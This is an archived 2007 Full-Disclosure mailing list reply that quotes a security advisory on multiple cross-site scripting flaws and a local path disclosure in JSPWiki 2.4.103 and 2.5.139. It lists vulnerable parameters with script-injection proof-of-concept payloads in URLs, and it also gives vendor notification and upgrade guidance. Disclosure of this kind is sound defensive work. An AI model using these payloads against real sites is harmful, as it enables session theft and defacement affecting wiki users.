| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-Id: <20070926113100.D64AEDA827@mailserver7.hushmail.com>
Date: Wed, 26 Sep 2007 07:30:59 -0400
From: <full-disclosure@...hmail.com>
To: <vulnwatch@...nwatch.org>, <full-disclosure@...ts.grok.org.uk>,
<kratzer.jason@...il.com>
Subject: Re: JSPWiki Multiple Input Validation
Vulnerabilities
Nice!!!!
JSPWiki 0day!
On Wed, 26 Sep 2007 00:35:53 -0400 Jason Kratzer
<kratzer.jason@...il.com> wrote:
>JSPWiki Multiple Input Validation Vulnerabilities
>
>Application: JSPWiki
>Version: 2.4.103 and 2.5.139
>BID: 25803
>Credit: Jason Kratzer
>Date: 9/24/2007
>
>
>Background
>------------------------------------------------------------
>JSPWiki is wiki software built around the standard J2EE components
>of
>Java, servlets and JSP. It was written by Janne Jalkanen and
>released
>under the LGPL. The Sun Java System Portal Server includes it as
>one
>of its core applications. It is primarily used for company
>intranets
>and has an active developer community, also including the i3G
>Institute of the Heilbronn University.
>
>(Courtesy of Wikipedia: http://en.wikipedia.org/wiki/JSPWiki)
>
>
>
>Description
>------------------------------------------------------------
>Multiple Cross Site Scripting vulnerabilities have been discovered
>within the JSPWiki application, successfully allowing an attacker
>to
>steal credentials, falsify posts, and persistently deface portions
>of
>the site. Additionally, a Local Path Disclosure vulnerability was
>also discovered.
>
>
>
>Affected Versions
>------------------------------------------------------------
>Each vulnerability was confirmed in versions 2.4.103 and 2.5.139-
>beta.
> The Cross Site Scripting vulnerability affecting the redirect
>parameter is only found in version 2.5.139-beta.
>
>
>
>Proof of Concept
>
>Cross Site Scripting Vulnerabilities:
>------------------------------------------------------------
>http://vulnerable-site.com/wiki/NewGroup.jsp?group=Test
>
> Vulnerable Parameters:
> group=Test"<script>alert("Test+XSS")</script>
> members= Test"<script>alert("Test+XSS")</script>
>
> Type: Reflective
>------------------------------------------------------------
>http://vulnerable-
>site.com/wiki/Edit.jsp?page=Main&action=save&edittime=1186698299838
>&addr=127.0.0.1&_editedtext=Test&changenote=Test&ok=Save
>
> Vulnerable Parameters:
> edittime=<script>alert("Test+XSS")</script>
>
> Type: Reflective
>------------------------------------------------------------
>http://vulnerable-
>site.com/wiki/Comment.jsp?page=Main&action=save&edittime=1186698386
>737&addr=127.0.0.1&_editedtext=Test&author=AnonymousCoward&link=&ok
>=Save
>
> Vulnerable Parameters:
> edittime=<script>alert("Test+XSS")</script>
> author=<script>alert("Test+XSS")</script>
> link="><SCRIPT>alert("Test+XSS")</SCRIPT>
>
> Type: Reflective
>------------------------------------------------------------
>http://vulnerable-
>site.com/wiki/UserPreferences.jsp?tab=profile&loginname=Test&passwo
>rd=Test&password2=Test&wikiname=Test&fullname=Test&email=Test@...t.
>com&ok=Save+profile&action=saveProfile
>http://vulnerable-
>site.com/wiki/Login.jsp?tab=profile&loginname=Test&password=Test&pa
>ssword2=Test&wikiname=Test&fullname=Test&email=Test@...t.com&ok=Sav
>e+profile&action=saveProfile
>
> Vulnerable Parameters:
> loginname="><script>alert("Test+XSS")</script>
> wikiname="><script>alert("Test+XSS")</script>
> fullname="><script>alert("Test+XSS")</script>
> email="><script>alert("Test+XSS")</script>
>
> Type: Reflective
>------------------------------------------------------------
>http://vulnerable-site.com/wiki/Diff.jsp?page=Administrator&r1=-
>1&r2=1
>
> Vulnerable Parameters:
> r1=<script>alert('Test XSS")</script>
> r2=<script>alert("Test+XSS")</script>
>
> Type: Reflective
>------------------------------------------------------------
>http://vulnerable-
>site.com/wiki/PageInfo.jsp?page=SystemInfo/test.jpg
>
> Vulnerable Parameters:
> changenote=<script>alert("Test+XSS")</script>
>
> Type: Stored
>------------------------------------------------------------
>http://vulnerable-site.com/wiki-3/Login.jsp?redirect=Main
>
> Vulnerable Parameter:
> redirect="><script>alert("Test+XSS")</script>
>
>Notes:
> The redirect parameter is found in multiple places through
>JSPWiki-2.5.139-beta and is vulnerable in every instance.
>
>------------------------------------------------------------
>
>Local Path Disclosure:
>
>http://vulnerable-site.com/wiki/attach/Main/Insert-Uploaded-
>Attachment-Filename-Here?version=1000000
>(Nonexistent #)
>
> Vulnerable Parameter;
> Version=10000000
>
>Notes:
> The non-existent number must be between 1 and 10 character
>otherwise a standard 500 error will be displayed.
>
>
>
>Vendor Notification
>------------------------------------------------------------
>The JSPWiki project was notified on September 10, 2007. Janne
>Jalkanen developed and implemented a fix by September 18, 2007.
>
>
>
>Remediation
>------------------------------------------------------------
>It is recommended to upgrade to JSPWiki version 2.4.104. It is
>also
>worth noting, the above vulnerabilities have also been fixed in
>the
>beta release, version 2.5.139.
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
--
Click here for to find products that will help grow your small business.
http://tagline.hushmail.com/fc/Ioyw6h4eDJa58QeqQZChgDR41kDBsOqlWnK9CObbwCzHOMDP3mf1yg/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists